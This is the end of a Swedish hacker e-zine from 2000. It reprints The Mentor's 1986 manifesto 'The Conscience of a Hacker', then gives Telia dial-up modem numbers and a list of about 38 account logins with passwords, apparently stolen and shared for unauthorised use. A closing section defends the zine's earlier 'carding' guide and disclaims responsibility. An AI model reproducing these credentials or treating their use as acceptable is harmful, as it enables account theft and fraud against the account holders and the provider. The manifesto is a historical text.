6.0  \/\The Conscience of a Hacker/\/ 
-------------------------------------------------------------------------------------------------------------------------->

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
The following was written shortly after my arrest...

                       \/\The Conscience of a Hacker/\/

                                      by

                               +++The Mentor+++

                          Written on January 8, 1986
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

        Another one got caught today, it's all over the papers.  "Teenager
Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"...
        Damn kids.  They're all alike.

        But did you, in your three-piece psychology and 1950's technobrain,
ever take a look behind the eyes of the hacker?  Did you ever wonder what
made him tick, what forces shaped him, what may have molded him?
        I am a hacker, enter my world...
        Mine is a world that begins with school... I'm smarter than most of
the other kids, this crap they teach us bores me...
        Damn underachiever.  They're all alike.

        I'm in junior high or high school.  I've listened to teachers explain
for the fifteenth time how to reduce a fraction.  I understand it.  "No, Ms.
Smith, I didn't show my work.  I did it in my head..."
        Damn kid.  Probably copied it.  They're all alike.

        I made a discovery today.  I found a computer.  Wait a second, this is
cool.  It does what I want it to.  If it makes a mistake, it's because I
screwed it up.  Not because it doesn't like me...
                Or feels threatened by me...
                Or thinks I'm a smart ass...
                Or doesn't like teaching and shouldn't be here...
        Damn kid.  All he does is play games.  They're all alike.

        And then it happened... a door opened to a world... rushing through
the phone line like heroin through an addict's veins, an electronic pulse is
sent out, a refuge from the day-to-day incompetencies is sought... a board is
found.
        "This is it... this is where I belong..."
        I know everyone here... even if I've never met them, never talked to
them, may never hear from them again... I know you all...
        Damn kid.  Tying up the phone line again.  They're all alike...

        You bet your ass we're all alike... we've been spoon-fed baby food at
school when we hungered for steak... the bits of meat that you did let slip
through were pre-chewed and tasteless.  We've been dominated by sadists, or
ignored by the apathetic.  The few that had something to teach found us will-
ing pupils, but those few are like drops of water in the desert.

        This is our world now... the world of the electron and the switch, the
beauty of the baud.  We make use of a service already existing without paying
for what could be dirt-cheap if it wasn't run by profiteering gluttons, and
you call us criminals.  We explore... and you call us criminals.  We seek
after knowledge... and you call us criminals.  We exist without skin color,
without nationality, without religious bias... and you call us criminals.
You build atomic bombs, you wage wars, you murder, cheat, and lie to us
and try to make us believe it's for our own good, yet we're the criminals.

        Yes, I am a criminal.  My crime is that of curiosity.  My crime is
that of judging people by what they say and think, not what they look like.
My crime is that of outsmarting you, something that you will never forgive me
for.

        I am a hacker, and this is my manifesto.  You may stop this individual,
but you can't stop us all... after all, we're all alike.

                               +++The Mentor+++
_______________________________________________________________________________



=========================================================================


-------------------------------------------------------------------------------------------------------------------------->
7.0 Telia Konton.
-------------------------------------------------------------------------------------------------------------------------->

Modempoler: 

28.8 - 33.6 = 020-333355

X2 = 020-335602

56flex = 020-335656        
________________
login: a010566907
password: 5TLF4EcP

login: u46301511
password: 3%fKAEq*

login: a010534477
password: jY4c9JXk

login: u43004510
password: !*6ALGHj

login: a00204827
password: AMBmcAhp

login: a010161131
password: JuA!WTxi

login: a010110597
password: t!d5PNu3

login: a00770200
password: 59hUASz5

login: a010052854
password: tziguz9y

login: a010132369
password: X3DPhDan

login: a010272295
password: L@nN%n8V

login: a010405462
password: 7L6iqqSq

login: u00109231
password: QgVV!mtu

login: a010325012
password: @NV6B3j9

login: a010522744
password: ELkMsLHD

login: a010185834
password: 7pfBkqX2

login: a010105448
password: GxKtcC4F

login: a010233759
password: prLaLhbt

login: a010233759
password: xpYDXrGr

login: a010520496  
password: Z3Q@iC4C

login: a010053202
password: ph45vEbN

login: u31603177
password: QLYmuXKZ

login: a010067762
password: cJjjMygv

login: u37012643
password: dqpMYz4S

login: a010134578
password: zWaj4d2G

login: a010485515
password: HhtpwdFk

login: a010098726
password: qyXHh4H*

login: a010280502
password: xMS5dVxQ

login: u18102438
password: ATFfFhqG

login: a010474532
password: t4uVutYU

login: u31727238
password: LSw@B9rQ

login: u00112411
password: s22yE8Vb

login: u31713411
password: HCpDrF2p

login: a010561873
password: xUBPZR*h

login: u87301917
password: u7bre@ai

login: u31771653
password: QswHjZwN

login: a010134578
password: zWaj4d2G

login: u85403446
password: XSD!ugH3

-------------------------------------------------------------------------------------------------------------------------->
8.0 Slutord.
-------------------------------------------------------------------------------------------------------------------------->

mm teliasuger.com har fått in en del klagomål när det gäller våran "020/carding guide" i förra nummret av "STREETWHORE". En
del personer på IRC menar att vi uppmanar till ripping. Det gör vi absolut INTE. Guiden var till för att lättare kunna använda
020 konton/CC information och att trada på ett sätt utan att bli rippad. teliasuger.com kan dock inte hindra någon att använda
den information som stog i guiden för att rippa. Det är upp till var och en. VI KAN EJ ANSVARA FÖR ENSKILDA PERSONERS HANDLINGAR
MED NÅGON FORM AV INFORMATION SOM PUBLICERAS HÄR.

-------------------------------------------------------------------------------------------------------------------------->
						    -END OF THE FILE-

Editor: sysedit
Mail: root@teliasuger.com

/Har ni frågor eller klagomål eller har ni information som ni skulle vilja publicera. Skicka då ett mail till root@teliasuger.com


(c)opyright teliasuger.com och streetwhore productions inc.. /datum: 2000-06-12 kl: 17:09


(Telia kontona har ej blivit testade. Så därför kan vi ej på teliasuger.com på något sätt hållas ansvarig för enskilda personers
handlingar med dom.VI AVSTÅR HELT FRÅN ANSVAR FRÅN DOM. Om ni har informatiom som stödjer att publiceringen av dom s.k Telia kontona är olaglig skicka då ett mail 
till root@teliasuger.com så ska vi omedelbart ta bort dom.)
